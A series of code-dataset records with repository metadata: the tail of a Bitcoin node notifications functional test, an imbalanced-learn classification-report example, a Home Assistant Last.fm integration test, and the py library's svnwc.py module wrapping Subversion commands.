self.wallet = ''.join(chr(i) for i in range(FILE_CHAR_START, FILE_CHAR_END) if chr(i) not in FILE_CHARS_DISALLOWED)
self.alertnotify_dir = os.path.join(self.options.tmpdir, "alertnotify")
self.blocknotify_dir = os.path.join(self.options.tmpdir, "blocknotify")
self.walletnotify_dir = os.path.join(self.options.tmpdir, "walletnotify")
os.mkdir(self.alertnotify_dir)
os.mkdir(self.blocknotify_dir)
os.mkdir(self.walletnotify_dir)
# -alertnotify and -blocknotify on node0, walletnotify on node1
self.extra_args = [[
"-alertnotify=echo > {}".format(os.path.join(self.alertnotify_dir, '%s')),
"-blocknotify=echo > {}".format(os.path.join(self.blocknotify_dir, '%s')),
"-mempoolreplacement=1",
], [
"-rescan",
"-walletnotify=echo > {}".format(os.path.join(self.walletnotify_dir, notify_outputname('%w', '%s'))),
"-mempoolreplacement=1",
]]
self.wallet_names = [self.default_wallet_name, self.wallet]
super().setup_network()
def run_test(self):
self.log.info("test -blocknotify")
block_count = 10
blocks = self.nodes[1].generatetoaddress(block_count, self.nodes[1].getnewaddress() if self.is_wallet_compiled() else ADDRESS_BCRT1_UNSPENDABLE)
# wait at most 10 seconds for expected number of files before reading the content
self.wait_until(lambda: len(os.listdir(self.blocknotify_dir)) == block_count, timeout=10)
# directory content should equal the generated blocks hashes
assert_equal(sorted(blocks), sorted(os.listdir(self.blocknotify_dir)))
if self.is_wallet_compiled():
self.log.info("test -walletnotify")
# wait at most 10 seconds for expected number of files before reading the content
self.wait_until(lambda: len(os.listdir(self.walletnotify_dir)) == block_count, timeout=10)
# directory content should equal the generated transaction hashes
txids_rpc = list(map(lambda t: notify_outputname(self.wallet, t['txid']), self.nodes[1].listtransactions("*", block_count)))
assert_equal(sorted(txids_rpc), sorted(os.listdir(self.walletnotify_dir)))
self.stop_node(1)
for tx_file in os.listdir(self.walletnotify_dir):
os.remove(os.path.join(self.walletnotify_dir, tx_file))
self.log.info("test -walletnotify after rescan")
# restart node to rescan to force wallet notifications
self.start_node(1)
self.connect_nodes(0, 1)
self.wait_until(lambda: len(os.listdir(self.walletnotify_dir)) == block_count, timeout=10)
# directory content should equal the generated transaction hashes
txids_rpc = list(map(lambda t: notify_outputname(self.wallet, t['txid']), self.nodes[1].listtransactions("*", block_count)))
assert_equal(sorted(txids_rpc), sorted(os.listdir(self.walletnotify_dir)))
for tx_file in os.listdir(self.walletnotify_dir):
os.remove(os.path.join(self.walletnotify_dir, tx_file))
# Conflicting transactions tests. Give node 0 same wallet seed as
# node 1, generate spends from node 0, and check notifications
# triggered by node 1
self.log.info("test -walletnotify with conflicting transactions")
self.nodes[0].sethdseed(seed=self.nodes[1].dumpprivkey(keyhash_to_p2pkh(hex_str_to_bytes(self.nodes[1].getwalletinfo()['hdseedid'])[::-1])))
self.nodes[0].rescanblockchain()
self.nodes[0].generatetoaddress(100, ADDRESS_BCRT1_UNSPENDABLE)
self.sync_blocks()
# Generate transaction on node 0, sync mempools, and check for
# notification on node 1.
tx1 = self.nodes[0].sendtoaddress(address=ADDRESS_BCRT1_UNSPENDABLE, amount=1, replaceable=True)
assert_equal(tx1 in self.nodes[0].getrawmempool(), True)
self.sync_mempools()
self.expect_wallet_notify([tx1])
# Generate bump transaction, sync mempools, and check for bump1
# notification. In the future, per
# https://github.com/bitcoin/bitcoin/pull/9371, it might be better
# to have notifications for both tx1 and bump1.
bump1 = self.nodes[0].bumpfee(tx1)["txid"]
assert_equal(bump1 in self.nodes[0].getrawmempool(), True)
self.sync_mempools()
self.expect_wallet_notify([bump1])
# Add bump1 transaction to new block, checking for a notification
# and the correct number of confirmations.
self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_UNSPENDABLE)
self.sync_blocks()
self.expect_wallet_notify([bump1])
assert_equal(self.nodes[1].gettransaction(bump1)["confirmations"], 1)
# Generate a second transaction to be bumped.
tx2 = self.nodes[0].sendtoaddress(address=ADDRESS_BCRT1_UNSPENDABLE, amount=1, replaceable=True)
assert_equal(tx2 in self.nodes[0].getrawmempool(), True)
self.sync_mempools()
self.expect_wallet_notify([tx2])
# Bump tx2 as bump2 and generate a block on node 0 while
# disconnected, then reconnect and check for notifications on node 1
# about newly confirmed bump2 and newly conflicted tx2.
self.disconnect_nodes(0, 1)
bump2 = self.nodes[0].bumpfee(tx2)["txid"]
self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_UNSPENDABLE)
assert_equal(self.nodes[0].gettransaction(bump2)["confirmations"], 1)
assert_equal(tx2 in self.nodes[1].getrawmempool(), True)
self.connect_nodes(0, 1)
self.sync_blocks()
self.expect_wallet_notify([bump2, tx2])
assert_equal(self.nodes[1].gettransaction(bump2)["confirmations"], 1)
# TODO: add test for `-alertnotify` large fork notifications
def expect_wallet_notify(self, tx_ids):
self.wait_until(lambda: len(os.listdir(self.walletnotify_dir)) >= len(tx_ids), timeout=10)
assert_equal(sorted(notify_outputname(self.wallet, tx_id) for tx_id in tx_ids), sorted(os.listdir(self.walletnotify_dir)))
for tx_file in os.listdir(self.walletnotify_dir):
os.remove(os.path.join(self.walletnotify_dir, tx_file))
if __name__ == '__main__':
NotificationsTest().main()
|
995094a6e303aa40ebd5846a68aa65540f08632d
|
1f7afd1360d14d7ebd6e48dd4328f384c8cdf486
|
/examples/evaluation/plot_classification_report.py
|
7d21371b4f51a47f83e622c651566d5073aeff14
|
[
"MIT"
] |
permissive
|
scikit-learn-contrib/imbalanced-learn
|
add5eef6af31ff229e8a99cc8767a76da83fc647
|
27bb6c7b0fab2dd0941ed56d2895478776c74f95
|
refs/heads/master
| 2023-08-31T21:40:03.484581
| 2023-08-09T08:39:17
| 2023-08-09T08:39:17
| 23,011,147
| 6,423
| 1,286
|
MIT
| 2023-09-07T14:08:47
| 2014-08-16T05:08:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,584
|
py
|
plot_classification_report.py
|
"""
=============================================
Evaluate classification by compiling a report
=============================================
Specific metrics have been developed to evaluate classifier which has been
trained using imbalanced data. :mod:`imblearn` provides a classification report
similar to :mod:`sklearn`, with additional metrics specific to imbalanced
learning problem.
"""
# Authors: Guillaume Lemaitre <g.lemaitre58@gmail.com>
# License: MIT
from sklearn import datasets
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from imblearn import over_sampling as os
from imblearn import pipeline as pl
from imblearn.metrics import classification_report_imbalanced
print(__doc__)
RANDOM_STATE = 42
# Generate a dataset
X, y = datasets.make_classification(
n_classes=2,
class_sep=2,
weights=[0.1, 0.9],
n_informative=10,
n_redundant=1,
flip_y=0,
n_features=20,
n_clusters_per_class=4,
n_samples=5000,
random_state=RANDOM_STATE,
)
pipeline = pl.make_pipeline(
StandardScaler(),
os.SMOTE(random_state=RANDOM_STATE),
LogisticRegression(max_iter=10_000),
)
# Split the data
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=RANDOM_STATE)
# Train the classifier with balancing
pipeline.fit(X_train, y_train)
# Test the classifier and get the prediction
y_pred_bal = pipeline.predict(X_test)
# Show the classification report
print(classification_report_imbalanced(y_test, y_pred_bal))
|
fd03f0065dd6451a9c1cf08a038a781a7afffc28
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/tests/components/lastfm/test_init.py
|
2f126af11a3307882890151a7f514a1c00d1cf94
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 864
|
py
|
test_init.py
|
"""Test LastFM component setup process."""
from __future__ import annotations
from homeassistant.components.lastfm.const import DOMAIN
from homeassistant.core import HomeAssistant
from . import MockUser
from .conftest import ComponentSetup
from tests.common import MockConfigEntry
async def test_load_unload_entry(
hass: HomeAssistant,
setup_integration: ComponentSetup,
config_entry: MockConfigEntry,
default_user: MockUser,
) -> None:
"""Test load and unload entry."""
await setup_integration(config_entry, default_user)
entry = hass.config_entries.async_entries(DOMAIN)[0]
state = hass.states.get("sensor.lastfm_testaccount1")
assert state
await hass.config_entries.async_remove(entry.entry_id)
await hass.async_block_till_done()
state = hass.states.get("sensor.lastfm_testaccount1")
assert not state
|
646cb5c5474efd6ba1107510e78ca7888123b406
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/py/py/_path/svnwc.py
|
b5b9d8d544a25253dab87a4f9d1bc3752f38ba06
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 43,825
|
py
|
svnwc.py
|
"""
svn-Command based Implementation of a Subversion WorkingCopy Path.
SvnWCCommandPath is the main class.
"""
import os, sys, time, re, calendar
import py
import subprocess
from py._path import common
#-----------------------------------------------------------
# Caching latest repository revision and repo-paths
# (getting them is slow with the current implementations)
#
# XXX make mt-safe
#-----------------------------------------------------------
class cache:
proplist = {}
info = {}
entries = {}
prop = {}
class RepoEntry:
def __init__(self, url, rev, timestamp):
self.url = url
self.rev = rev
self.timestamp = timestamp
def __str__(self):
return "repo: %s;%s %s" %(self.url, self.rev, self.timestamp)
class RepoCache:
""" The Repocache manages discovered repository paths
and their revisions. If inside a timeout the cache
will even return the revision of the root.
"""
timeout = 20 # seconds after which we forget that we know the last revision
def __init__(self):
self.repos = []
def clear(self):
self.repos = []
def put(self, url, rev, timestamp=None):
if rev is None:
return
if timestamp is None:
timestamp = time.time()
for entry in self.repos:
if url == entry.url:
entry.timestamp = timestamp
entry.rev = rev
#print "set repo", entry
break
else:
entry = RepoEntry(url, rev, timestamp)
self.repos.append(entry)
#print "appended repo", entry
def get(self, url):
now = time.time()
for entry in self.repos:
if url.startswith(entry.url):
if now < entry.timestamp + self.timeout:
#print "returning immediate Etrny", entry
return entry.url, entry.rev
return entry.url, -1
return url, -1
repositories = RepoCache()
# svn support code
ALLOWED_CHARS = "_ -/\\=$.~+%" #add characters as necessary when tested
if sys.platform == "win32":
ALLOWED_CHARS += ":"
ALLOWED_CHARS_HOST = ALLOWED_CHARS + '@:'
def _getsvnversion(ver=[]):
try:
return ver[0]
except IndexError:
v = py.process.cmdexec("svn -q --version")
v.strip()
v = '.'.join(v.split('.')[:2])
ver.append(v)
return v
def _escape_helper(text):
text = str(text)
if sys.platform != 'win32':
text = str(text).replace('$', '\\$')
return text
def _check_for_bad_chars(text, allowed_chars=ALLOWED_CHARS):
for c in str(text):
if c.isalnum():
continue
if c in allowed_chars:
continue
return True
return False
def checkbadchars(url):
# (hpk) not quite sure about the exact purpose, guido w.?
proto, uri = url.split("://", 1)
if proto != "file":
host, uripath = uri.split('/', 1)
# only check for bad chars in the non-protocol parts
if (_check_for_bad_chars(host, ALLOWED_CHARS_HOST) \
or _check_for_bad_chars(uripath, ALLOWED_CHARS)):
raise ValueError("bad char in %r" % (url, ))
#_______________________________________________________________
class SvnPathBase(common.PathBase):
""" Base implementation for SvnPath implementations. """
sep = '/'
def _geturl(self):
return self.strpath
url = property(_geturl, None, None, "url of this svn-path.")
def __str__(self):
""" return a string representation (including rev-number) """
return self.strpath
def __hash__(self):
return hash(self.strpath)
def new(self, **kw):
""" create a modified version of this path. A 'rev' argument
indicates a new revision.
the following keyword arguments modify various path parts::
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
obj = object.__new__(self.__class__)
obj.rev = kw.get('rev', self.rev)
obj.auth = kw.get('auth', self.auth)
dirname, basename, purebasename, ext = self._getbyspec(
"dirname,basename,purebasename,ext")
if 'basename' in kw:
if 'purebasename' in kw or 'ext' in kw:
raise ValueError("invalid specification %r" % kw)
else:
pb = kw.setdefault('purebasename', purebasename)
ext = kw.setdefault('ext', ext)
if ext and not ext.startswith('.'):
ext = '.' + ext
kw['basename'] = pb + ext
kw.setdefault('dirname', dirname)
kw.setdefault('sep', self.sep)
if kw['basename']:
obj.strpath = "%(dirname)s%(sep)s%(basename)s" % kw
else:
obj.strpath = "%(dirname)s" % kw
return obj
def _getbyspec(self, spec):
""" get specified parts of the path. 'arg' is a string
with comma separated path parts. The parts are returned
in exactly the order of the specification.
you may specify the following parts:
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
res = []
parts = self.strpath.split(self.sep)
for name in spec.split(','):
name = name.strip()
if name == 'dirname':
res.append(self.sep.join(parts[:-1]))
elif name == 'basename':
res.append(parts[-1])
else:
basename = parts[-1]
i = basename.rfind('.')
if i == -1:
purebasename, ext = basename, ''
else:
purebasename, ext = basename[:i], basename[i:]
if name == 'purebasename':
res.append(purebasename)
elif name == 'ext':
res.append(ext)
else:
raise NameError("Don't know part %r" % name)
return res
def __eq__(self, other):
""" return true if path and rev attributes each match """
return (str(self) == str(other) and
(self.rev == other.rev or self.rev == other.rev))
def __ne__(self, other):
return not self == other
def join(self, *args):
""" return a new Path (with the same revision) which is composed
of the self Path followed by 'args' path components.
"""
if not args:
return self
args = tuple([arg.strip(self.sep) for arg in args])
parts = (self.strpath, ) + args
newpath = self.__class__(self.sep.join(parts), self.rev, self.auth)
return newpath
def propget(self, name):
""" return the content of the given property. """
value = self._propget(name)
return value
def proplist(self):
""" list all property names. """
content = self._proplist()
return content
def size(self):
""" Return the size of the file content of the Path. """
return self.info().size
def mtime(self):
""" Return the last modification time of the file. """
return self.info().mtime
# shared help methods
def _escape(self, cmd):
return _escape_helper(cmd)
#def _childmaxrev(self):
# """ return maximum revision number of childs (or self.rev if no childs) """
# rev = self.rev
# for name, info in self._listdir_nameinfo():
# rev = max(rev, info.created_rev)
# return rev
#def _getlatestrevision(self):
# """ return latest repo-revision for this path. """
# url = self.strpath
# path = self.__class__(url, None)
#
# # we need a long walk to find the root-repo and revision
# while 1:
# try:
# rev = max(rev, path._childmaxrev())
# previous = path
# path = path.dirpath()
# except (IOError, process.cmdexec.Error):
# break
# if rev is None:
# raise IOError, "could not determine newest repo revision for %s" % self
# return rev
class Checkers(common.Checkers):
def dir(self):
try:
return self.path.info().kind == 'dir'
except py.error.Error:
return self._listdirworks()
def _listdirworks(self):
try:
self.path.listdir()
except py.error.ENOENT:
return False
else:
return True
def file(self):
try:
return self.path.info().kind == 'file'
except py.error.ENOENT:
return False
def exists(self):
try:
return self.path.info()
except py.error.ENOENT:
return self._listdirworks()
def parse_apr_time(timestr):
i = timestr.rfind('.')
if i == -1:
raise ValueError("could not parse %s" % timestr)
timestr = timestr[:i]
parsedtime = time.strptime(timestr, "%Y-%m-%dT%H:%M:%S")
return time.mktime(parsedtime)
class PropListDict(dict):
""" a Dictionary which fetches values (InfoSvnCommand instances) lazily"""
def __init__(self, path, keynames):
dict.__init__(self, [(x, None) for x in keynames])
self.path = path
def __getitem__(self, key):
value = dict.__getitem__(self, key)
if value is None:
value = self.path.propget(key)
dict.__setitem__(self, key, value)
return value
def fixlocale():
if sys.platform != 'win32':
return 'LC_ALL=C '
return ''
# some nasty chunk of code to solve path and url conversion and quoting issues
ILLEGAL_CHARS = '* | \\ / : < > ? \t \n \x0b \x0c \r'.split(' ')
if os.sep in ILLEGAL_CHARS:
ILLEGAL_CHARS.remove(os.sep)
ISWINDOWS = sys.platform == 'win32'
_reg_allow_disk = re.compile(r'^([a-z]\:\\)?[^:]+$', re.I)
def _check_path(path):
illegal = ILLEGAL_CHARS[:]
sp = path.strpath
if ISWINDOWS:
illegal.remove(':')
if not _reg_allow_disk.match(sp):
raise ValueError('path may not contain a colon (:)')
for char in sp:
if char not in string.printable or char in illegal:
raise ValueError('illegal character %r in path' % (char,))
def path_to_fspath(path, addat=True):
_check_path(path)
sp = path.strpath
if addat and path.rev != -1:
sp = '%s@%s' % (sp, path.rev)
elif addat:
sp = '%s@HEAD' % (sp,)
return sp
def url_from_path(path):
fspath = path_to_fspath(path, False)
from urllib import quote
if ISWINDOWS:
match = _reg_allow_disk.match(fspath)
fspath = fspath.replace('\\', '/')
if match.group(1):
fspath = '/%s%s' % (match.group(1).replace('\\', '/'),
quote(fspath[len(match.group(1)):]))
else:
fspath = quote(fspath)
else:
fspath = quote(fspath)
if path.rev != -1:
fspath = '%s@%s' % (fspath, path.rev)
else:
fspath = '%s@HEAD' % (fspath,)
return 'file://%s' % (fspath,)
class SvnAuth(object):
""" container for auth information for Subversion """
def __init__(self, username, password, cache_auth=True, interactive=True):
self.username = username
self.password = password
self.cache_auth = cache_auth
self.interactive = interactive
def makecmdoptions(self):
uname = self.username.replace('"', '\\"')
passwd = self.password.replace('"', '\\"')
ret = []
if uname:
ret.append('--username="%s"' % (uname,))
if passwd:
ret.append('--password="%s"' % (passwd,))
if not self.cache_auth:
ret.append('--no-auth-cache')
if not self.interactive:
ret.append('--non-interactive')
return ' '.join(ret)
def __str__(self):
return "<SvnAuth username=%s ...>" %(self.username,)
rex_blame = re.compile(r'\s*(\d+)\s+(\S+) (.*)')
class SvnWCCommandPath(common.PathBase):
""" path implementation offering access/modification to svn working copies.
It has methods similar to the functions in os.path and similar to the
commands of the svn client.
"""
sep = os.sep
def __new__(cls, wcpath=None, auth=None):
self = object.__new__(cls)
if isinstance(wcpath, cls):
if wcpath.__class__ == cls:
return wcpath
wcpath = wcpath.localpath
if _check_for_bad_chars(str(wcpath),
ALLOWED_CHARS):
raise ValueError("bad char in wcpath %s" % (wcpath, ))
self.localpath = py.path.local(wcpath)
self.auth = auth
return self
strpath = property(lambda x: str(x.localpath), None, None, "string path")
rev = property(lambda x: x.info(usecache=0).rev, None, None, "revision")
def __eq__(self, other):
return self.localpath == getattr(other, 'localpath', None)
def _geturl(self):
if getattr(self, '_url', None) is None:
info = self.info()
self._url = info.url #SvnPath(info.url, info.rev)
assert isinstance(self._url, py.builtin._basestring)
return self._url
url = property(_geturl, None, None, "url of this WC item")
def _escape(self, cmd):
return _escape_helper(cmd)
def dump(self, obj):
""" pickle object into path location"""
return self.localpath.dump(obj)
def svnurl(self):
""" return current SvnPath for this WC-item. """
info = self.info()
return py.path.svnurl(info.url)
def __repr__(self):
return "svnwc(%r)" % (self.strpath) # , self._url)
def __str__(self):
return str(self.localpath)
def _makeauthoptions(self):
if self.auth is None:
return ''
return self.auth.makecmdoptions()
def _authsvn(self, cmd, args=None):
args = args and list(args) or []
args.append(self._makeauthoptions())
return self._svn(cmd, *args)
def _svn(self, cmd, *args):
l = ['svn %s' % cmd]
args = [self._escape(item) for item in args]
l.extend(args)
l.append('"%s"' % self._escape(self.strpath))
# try fixing the locale because we can't otherwise parse
string = fixlocale() + " ".join(l)
try:
try:
key = 'LC_MESSAGES'
hold = os.environ.get(key)
os.environ[key] = 'C'
out = py.process.cmdexec(string)
finally:
if hold:
os.environ[key] = hold
else:
del os.environ[key]
except py.process.cmdexec.Error:
e = sys.exc_info()[1]
strerr = e.err.lower()
if strerr.find('not found') != -1:
raise py.error.ENOENT(self)
elif strerr.find("E200009:") != -1:
raise py.error.ENOENT(self)
if (strerr.find('file exists') != -1 or
strerr.find('file already exists') != -1 or
strerr.find('w150002:') != -1 or
strerr.find("can't create directory") != -1):
raise py.error.EEXIST(strerr) #self)
raise
return out
def switch(self, url):
""" switch to given URL. """
self._authsvn('switch', [url])
def checkout(self, url=None, rev=None):
""" checkout from url to local wcpath. """
args = []
if url is None:
url = self.url
if rev is None or rev == -1:
if (sys.platform != 'win32' and
_getsvnversion() == '1.3'):
url += "@HEAD"
else:
if _getsvnversion() == '1.3':
url += "@%d" % rev
else:
args.append('-r' + str(rev))
args.append(url)
self._authsvn('co', args)
def update(self, rev='HEAD', interactive=True):
""" update working copy item to given revision. (None -> HEAD). """
opts = ['-r', rev]
if not interactive:
opts.append("--non-interactive")
self._authsvn('up', opts)
def write(self, content, mode='w'):
""" write content into local filesystem wc. """
self.localpath.write(content, mode)
def dirpath(self, *args):
""" return the directory Path of the current Path. """
return self.__class__(self.localpath.dirpath(*args), auth=self.auth)
def _ensuredirs(self):
parent = self.dirpath()
if parent.check(dir=0):
parent._ensuredirs()
if self.check(dir=0):
self.mkdir()
return self
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). if you specify a keyword argument 'directory=True'
then the path is forced to be a directory path.
"""
p = self.join(*args)
if p.check():
if p.check(versioned=False):
p.add()
return p
if kwargs.get('dir', 0):
return p._ensuredirs()
parent = p.dirpath()
parent._ensuredirs()
p.write("")
p.add()
return p
def mkdir(self, *args):
""" create & return the directory joined with args. """
if args:
return self.join(*args).mkdir()
else:
self._svn('mkdir')
return self
def add(self):
""" add ourself to svn """
self._svn('add')
def remove(self, rec=1, force=1):
""" remove a file or a directory tree. 'rec'ursive is
ignored and considered always true (because of
underlying svn semantics.
"""
assert rec, "svn cannot remove non-recursively"
if not self.check(versioned=True):
# not added to svn (anymore?), just remove
py.path.local(self).remove()
return
flags = []
if force:
flags.append('--force')
self._svn('remove', *flags)
def copy(self, target):
""" copy path to target."""
py.process.cmdexec("svn copy %s %s" %(str(self), str(target)))
def rename(self, target):
""" rename this path to target. """
py.process.cmdexec("svn move --force %s %s" %(str(self), str(target)))
def lock(self):
""" set a lock (exclusive) on the resource """
out = self._authsvn('lock').strip()
if not out:
# warning or error, raise exception
raise ValueError("unknown error in svn lock command")
def unlock(self):
""" unset a previously set lock """
out = self._authsvn('unlock').strip()
if out.startswith('svn:'):
# warning or error, raise exception
raise Exception(out[4:])
def cleanup(self):
""" remove any locks from the resource """
# XXX should be fixed properly!!!
try:
self.unlock()
except:
pass
def status(self, updates=0, rec=0, externals=0):
""" return (collective) Status object for this file. """
# http://svnbook.red-bean.com/book.html#svn-ch-3-sect-4.3.1
# 2201 2192 jum test
# XXX
if externals:
raise ValueError("XXX cannot perform status() "
"on external items yet")
else:
#1.2 supports: externals = '--ignore-externals'
externals = ''
if rec:
rec= ''
else:
rec = '--non-recursive'
# XXX does not work on all subversion versions
#if not externals:
# externals = '--ignore-externals'
if updates:
updates = '-u'
else:
updates = ''
try:
cmd = 'status -v --xml --no-ignore %s %s %s' % (
updates, rec, externals)
out = self._authsvn(cmd)
except py.process.cmdexec.Error:
cmd = 'status -v --no-ignore %s %s %s' % (
updates, rec, externals)
out = self._authsvn(cmd)
rootstatus = WCStatus(self).fromstring(out, self)
else:
rootstatus = XMLWCStatus(self).fromstring(out, self)
return rootstatus
def diff(self, rev=None):
""" return a diff of the current path against revision rev (defaulting
to the last one).
"""
args = []
if rev is not None:
args.append("-r %d" % rev)
out = self._authsvn('diff', args)
return out
def blame(self):
""" return a list of tuples of three elements:
(revision, commiter, line)
"""
out = self._svn('blame')
result = []
blamelines = out.splitlines()
reallines = py.path.svnurl(self.url).readlines()
for i, (blameline, line) in enumerate(
zip(blamelines, reallines)):
m = rex_blame.match(blameline)
if not m:
raise ValueError("output line %r of svn blame does not match "
"expected format" % (line, ))
rev, name, _ = m.groups()
result.append((int(rev), name, line))
return result
_rex_commit = re.compile(r'.*Committed revision (\d+)\.$', re.DOTALL)
def commit(self, msg='', rec=1):
""" commit with support for non-recursive commits """
# XXX i guess escaping should be done better here?!?
cmd = 'commit -m "%s" --force-log' % (msg.replace('"', '\\"'),)
if not rec:
cmd += ' -N'
out = self._authsvn(cmd)
try:
del cache.info[self]
except KeyError:
pass
if out:
m = self._rex_commit.match(out)
return int(m.group(1))
def propset(self, name, value, *args):
""" set property name to value on this path. """
d = py.path.local.mkdtemp()
try:
p = d.join('value')
p.write(value)
self._svn('propset', name, '--file', str(p), *args)
finally:
d.remove()
def propget(self, name):
""" get property name on this path. """
res = self._svn('propget', name)
return res[:-1] # strip trailing newline
def propdel(self, name):
""" delete property name on this path. """
res = self._svn('propdel', name)
return res[:-1] # strip trailing newline
def proplist(self, rec=0):
""" return a mapping of property names to property values.
If rec is True, then return a dictionary mapping sub-paths to such mappings.
"""
if rec:
res = self._svn('proplist -R')
return make_recursive_propdict(self, res)
else:
res = self._svn('proplist')
lines = res.split('\n')
lines = [x.strip() for x in lines[1:]]
return PropListDict(self, lines)
def revert(self, rec=0):
""" revert the local changes of this path. if rec is True, do so
recursively. """
if rec:
result = self._svn('revert -R')
else:
result = self._svn('revert')
return result
def new(self, **kw):
""" create a modified version of this path. A 'rev' argument
indicates a new revision.
the following keyword arguments modify various path parts:
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
if kw:
localpath = self.localpath.new(**kw)
else:
localpath = self.localpath
return self.__class__(localpath, auth=self.auth)
def join(self, *args, **kwargs):
""" return a new Path (with the same revision) which is composed
of the self Path followed by 'args' path components.
"""
if not args:
return self
localpath = self.localpath.join(*args, **kwargs)
return self.__class__(localpath, auth=self.auth)
def info(self, usecache=1):
""" return an Info structure with svn-provided information. """
info = usecache and cache.info.get(self)
if not info:
try:
output = self._svn('info')
except py.process.cmdexec.Error:
e = sys.exc_info()[1]
if e.err.find('Path is not a working copy directory') != -1:
raise py.error.ENOENT(self, e.err)
elif e.err.find("is not under version control") != -1:
raise py.error.ENOENT(self, e.err)
raise
# XXX SVN 1.3 has output on stderr instead of stdout (while it does
# return 0!), so a bit nasty, but we assume no output is output
# to stderr...
if (output.strip() == '' or
output.lower().find('not a versioned resource') != -1):
raise py.error.ENOENT(self, output)
info = InfoSvnWCCommand(output)
# Can't reliably compare on Windows without access to win32api
if sys.platform != 'win32':
if info.path != self.localpath:
raise py.error.ENOENT(self, "not a versioned resource:" +
" %s != %s" % (info.path, self.localpath))
cache.info[self] = info
return info
def listdir(self, fil=None, sort=None):
""" return a sequence of Paths.
listdir will return either a tuple or a list of paths
depending on implementation choices.
"""
if isinstance(fil, str):
fil = common.FNMatcher(fil)
# XXX unify argument naming with LocalPath.listdir
def notsvn(path):
return path.basename != '.svn'
paths = []
for localpath in self.localpath.listdir(notsvn):
p = self.__class__(localpath, auth=self.auth)
if notsvn(p) and (not fil or fil(p)):
paths.append(p)
self._sortlist(paths, sort)
return paths
def open(self, mode='r'):
""" return an opened file with the given mode. """
return open(self.strpath, mode)
def _getbyspec(self, spec):
return self.localpath._getbyspec(spec)
class Checkers(py.path.local.Checkers):
def __init__(self, path):
self.svnwcpath = path
self.path = path.localpath
def versioned(self):
try:
s = self.svnwcpath.info()
except (py.error.ENOENT, py.error.EEXIST):
return False
except py.process.cmdexec.Error:
e = sys.exc_info()[1]
if e.err.find('is not a working copy')!=-1:
return False
if e.err.lower().find('not a versioned resource') != -1:
return False
raise
else:
return True
def log(self, rev_start=None, rev_end=1, verbose=False):
""" return a list of LogEntry instances for this path.
rev_start is the starting revision (defaulting to the first one).
rev_end is the last revision (defaulting to HEAD).
if verbose is True, then the LogEntry instances also know which files changed.
"""
assert self.check() # make it simpler for the pipe
rev_start = rev_start is None and "HEAD" or rev_start
rev_end = rev_end is None and "HEAD" or rev_end
if rev_start == "HEAD" and rev_end == 1:
rev_opt = ""
else:
rev_opt = "-r %s:%s" % (rev_start, rev_end)
verbose_opt = verbose and "-v" or ""
locale_env = fixlocale()
# some blather on stderr
auth_opt = self._makeauthoptions()
#stdin, stdout, stderr = os.popen3(locale_env +
# 'svn log --xml %s %s %s "%s"' % (
# rev_opt, verbose_opt, auth_opt,
# self.strpath))
cmd = locale_env + 'svn log --xml %s %s %s "%s"' % (
rev_opt, verbose_opt, auth_opt, self.strpath)
popen = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
stdout, stderr = popen.communicate()
stdout = py.builtin._totext(stdout, sys.getdefaultencoding())
minidom,ExpatError = importxml()
try:
tree = minidom.parseString(stdout)
except ExpatError:
raise ValueError('no such revision')
result = []
for logentry in filter(None, tree.firstChild.childNodes):
if logentry.nodeType == logentry.ELEMENT_NODE:
result.append(LogEntry(logentry))
return result
def size(self):
""" Return the size of the file content of the Path. """
return self.info().size
def mtime(self):
""" Return the last modification time of the file. """
return self.info().mtime
def __hash__(self):
return hash((self.strpath, self.__class__, self.auth))
class WCStatus:
attrnames = ('modified','added', 'conflict', 'unchanged', 'external',
'deleted', 'prop_modified', 'unknown', 'update_available',
'incomplete', 'kindmismatch', 'ignored', 'locked', 'replaced'
)
def __init__(self, wcpath, rev=None, modrev=None, author=None):
self.wcpath = wcpath
self.rev = rev
self.modrev = modrev
self.author = author
for name in self.attrnames:
setattr(self, name, [])
def allpath(self, sort=True, **kw):
d = {}
for name in self.attrnames:
if name not in kw or kw[name]:
for path in getattr(self, name):
d[path] = 1
l = d.keys()
if sort:
l.sort()
return l
# XXX a bit scary to assume there's always 2 spaces between username and
# path, however with win32 allowing spaces in user names there doesn't
# seem to be a more solid approach :(
_rex_status = re.compile(r'\s+(\d+|-)\s+(\S+)\s+(.+?)\s{2,}(.*)')
def fromstring(data, rootwcpath, rev=None, modrev=None, author=None):
""" return a new WCStatus object from data 's'
"""
rootstatus = WCStatus(rootwcpath, rev, modrev, author)
update_rev = None
for line in data.split('\n'):
if not line.strip():
continue
#print "processing %r" % line
flags, rest = line[:8], line[8:]
# first column
c0,c1,c2,c3,c4,c5,x6,c7 = flags
#if '*' in line:
# print "flags", repr(flags), "rest", repr(rest)
if c0 in '?XI':
fn = line.split(None, 1)[1]
if c0 == '?':
wcpath = rootwcpath.join(fn, abs=1)
